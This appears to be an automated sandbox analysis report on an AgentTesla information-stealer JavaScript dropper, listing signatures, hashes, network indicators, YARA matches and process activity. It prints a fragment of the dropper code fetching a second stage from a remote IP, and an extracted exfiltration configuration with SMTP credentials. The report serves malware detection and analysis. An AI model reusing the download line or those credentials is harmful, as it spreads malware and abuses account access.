Windows Analysis Report
DVycy79WuR.js

Overview

General Information

Sample name: DVycy79WuR.js
renamed because original name is a hash value
Original sample name: 7520862f75d82d3f3083c8a983fc85cf.js
Analysis ID: 1467969
MD5: 7520862f75d82d3f3083c8a983fc85cf
SHA1: 86e8c5ac45d27b92268e8d0b78335491bbce8ba8
SHA256: 106e5d2356c57555ce0aa1c55daae0df8615344336b11e4848663581fd55d73d
Tags: js
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Contains functionality to log keystrokes (.Net Source)
Installs a global keyboard hook
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
 https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mkl[1].js Avira: detection malicious, Label: JS/Dldr.G17
Source: C:\Users\user\AppData\Local\Temp\DNQUBU.js Avira: detection malicious, Label: JS/Dldr.G17
Found malware configuration
Source: 5.0.tqxse.exe.700000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.gmail.com", "Username": "mj08083399@gmail.com", "Password": "bizr usjt guapiims"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe ReversingLabs: Detection: 84%
Multi AV Scanner detection for submitted file
Source: DVycy79WuR.js ReversingLabs: Detection: 26%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Code function: 5_2_05F780FC CryptUnprotectData, 5_2_05F780FC
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Code function: 5_2_05F78650 CryptUnprotectData, 5_2_05F78650
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior

Software Vulnerabilities
barindex
JavaScript source code contains functionality to generate code involving a shell, file or stream
Source: DVycy79WuR.js Argument value : ['"try{\nvar Object = new ActiveXObject("MSXML2.XMLHTTP");\nObject.Open("GET", "http://192.210.215.11/zo'] Go to definition

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 192.210.215.11 80 Jump to behavior
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Source: DVycy79WuR.js Argument value : ['"try{\nvar Object = new ActiveXObject("MSXML2.XMLHTTP");\nObject.Open("GET", "http://192.210.215.11/zo'] Go to definition
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:54850 -> 142.251.173.109:587
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.6:54850 -> 142.251.173.109:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /zoom/mkl.js HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.210.215.11Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /zoom/mkl.js HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.210.215.11Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: smtp.gmail.com
Source: wscript.exe, 00000000.00000003.2338236583.000001C247B8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoom/mkl.js
Source: wscript.exe, 00000000.00000003.2340265785.000001C247C15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoom/mkl.jsd(
Source: tqxse.exe, 00000005.00000002.3414861721.00000000061A6000.00000004.00000020.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3412173760.0000000002ABB000.00000004.00000800.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3409718764.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3414861721.00000000061DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://c.pki.goog/r/r1.crl0
Source: tqxse.exe, 00000005.00000002.3414861721.00000000061A6000.00000004.00000020.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3412173760.0000000002ABB000.00000004.00000800.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3414861721.00000000061DD000.00000004.00000020.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3412173760.0000000002B0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://c.pki.goog/wr2/GSyT1N4PBrg.crl0
Source: tqxse.exe, 00000005.00000002.3414861721.00000000061A6000.00000004.00000020.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3412173760.0000000002ABB000.00000004.00000800.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3414861721.00000000061DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
Source: tqxse.exe, 00000005.00000002.3414861721.00000000061A6000.00000004.00000020.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3412173760.0000000002ABB000.00000004.00000800.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3409718764.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3414861721.00000000061DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://i.pki.goog/r1.crt0
Source: tqxse.exe, 00000005.00000002.3414861721.00000000061A6000.00000004.00000020.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3412173760.0000000002ABB000.00000004.00000800.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3414861721.00000000061DD000.00000004.00000020.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3412173760.0000000002B0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://i.pki.goog/wr2.crt0
Source: tqxse.exe, 00000005.00000002.3414861721.00000000061A6000.00000004.00000020.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3412173760.0000000002ABB000.00000004.00000800.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3414861721.00000000061DD000.00000004.00000020.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3412173760.0000000002B0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://o.pki.goog/wr20%
Source: tqxse.exe, 00000005.00000002.3414861721.00000000061A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.pki.goo
Source: tqxse.exe, 00000005.00000002.3414861721.00000000061A6000.00000004.00000020.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3412173760.0000000002ABB000.00000004.00000800.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3414861721.00000000061DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.pki.goog/gsr10)
Source: tqxse.exe, 00000005.00000002.3414861721.00000000061A6000.00000004.00000020.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3412173760.0000000002ABB000.00000004.00000800.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3414861721.00000000061DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
Source: tqxse.exe, 00000005.00000002.3412173760.0000000002ABB000.00000004.00000800.00020000.00000000.sdmp, tqxse.exe, 00000005.00000002.3412173760.0000000002B0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://smtp.gmail.com
Source: wscript.exe, 00000004.00000003.2373428146.0000018312751000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2374197721.000001830F63C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2382112016.0000018312682000.00000004.00000020.00020000.00000000.sdmp, tqxse.exe, 00000005.00000000.2373276954.0000000000702000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: https://account.dyn.com/
Source: wscript.exe, 00000000.00000003.2340779454.000001C247F5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2343513793.000001C247F5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to log keystrokes (.Net Source)
Source: tqxse.exe.4.dr, SKTzxzsJw.cs .Net Code: JhD
Installs a global keyboard hook
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\tqxse.exe Jump to behavior
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 5.0.tqxse.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.3.wscript.exe.1830f63b3a0.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.3.wscript.exe.1830f63b3a0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.3.wscript.exe.1830f63b3a0.2.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe, type: DROPPED Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Code function: 5_2_00F941C8 5_2_00F941C8
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Code function: 5_2_00F99470 5_2_00F99470
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Code function: 5_2_00F94A98 5_2_00F94A98
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Code function: 5_2_00F98CA8 5_2_00F98CA8
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Code function: 5_2_00F93E80 5_2_00F93E80
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Code function: 5_2_00F9CB7C 5_2_00F9CB7C
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Code function: 5_2_05F70448 5_2_05F70448
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Code function: 5_2_05F7AE20 5_2_05F7AE20
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Code function: 5_2_05F711F0 5_2_05F711F0
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Code function: 5_2_05F72990 5_2_05F72990
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Code function: 5_2_05F794E8 5_2_05F794E8
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Code function: 5_2_05F7EF02 5_2_05F7EF02
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Code function: 5_2_05F7EF08 5_2_05F7EF08
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Code function: 5_2_05F752A0 5_2_05F752A0
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Code function: 5_2_05F722A8 5_2_05F722A8
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\tqxse.exe 1F19267129CBABE2E50837F88EB2854C64521BD964F43A58F37365E60D5DA5BD
Yara signature match
Source: 5.0.tqxse.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.3.wscript.exe.1830f63b3a0.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.3.wscript.exe.1830f63b3a0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.3.wscript.exe.1830f63b3a0.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: tqxse.exe.4.dr, 4JJG6X.cs Cryptographic APIs: 'TransformFinalBlock'
Source: tqxse.exe.4.dr, 4JJG6X.cs Cryptographic APIs: 'TransformFinalBlock'
Source: tqxse.exe.4.dr, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
Source: tqxse.exe.4.dr, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
Source: tqxse.exe.4.dr, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
Source: tqxse.exe.4.dr, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
Source: tqxse.exe.4.dr, CqSP68Ir.cs Cryptographic APIs: 'TransformFinalBlock'
Source: tqxse.exe.4.dr, CqSP68Ir.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.evad.winJS@5/3@1/2
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mkl[1].js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Mutant created: NULL
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\DNQUBU.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: DVycy79WuR.js ReversingLabs: Detection: 26%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DVycy79WuR.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\DNQUBU.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\tqxse.exe "C:\Users\user\AppData\Local\Temp\tqxse.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\DNQUBU.js" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\tqxse.exe "C:\Users\user\AppData\Local\Temp\tqxse.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: ntasn1.dll Jump to behavior
